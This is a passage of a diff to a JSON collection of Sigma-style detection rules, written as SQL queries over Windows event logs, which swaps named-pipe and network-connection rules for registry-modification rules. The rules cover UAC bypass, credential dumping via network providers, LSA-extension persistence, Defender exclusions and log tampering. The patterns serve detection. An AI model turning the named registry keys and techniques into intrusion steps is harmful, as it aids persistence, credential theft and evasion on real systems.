'\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 
'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' 
AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + 
"attack.t1003" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", - "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "status": "experimental", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action 
is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could 
indicate the execution/download of remotely hosted .chm files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - 
"Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], - "falsepositives": [ - "Legitimate script" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" - ], - "filename": "net_connection_win_imewdbld.yml" - }, - { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1218.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "status": "experimental", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve 
persistence. Which will get invoked when an application crashes", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE 
'%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + 
"title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') 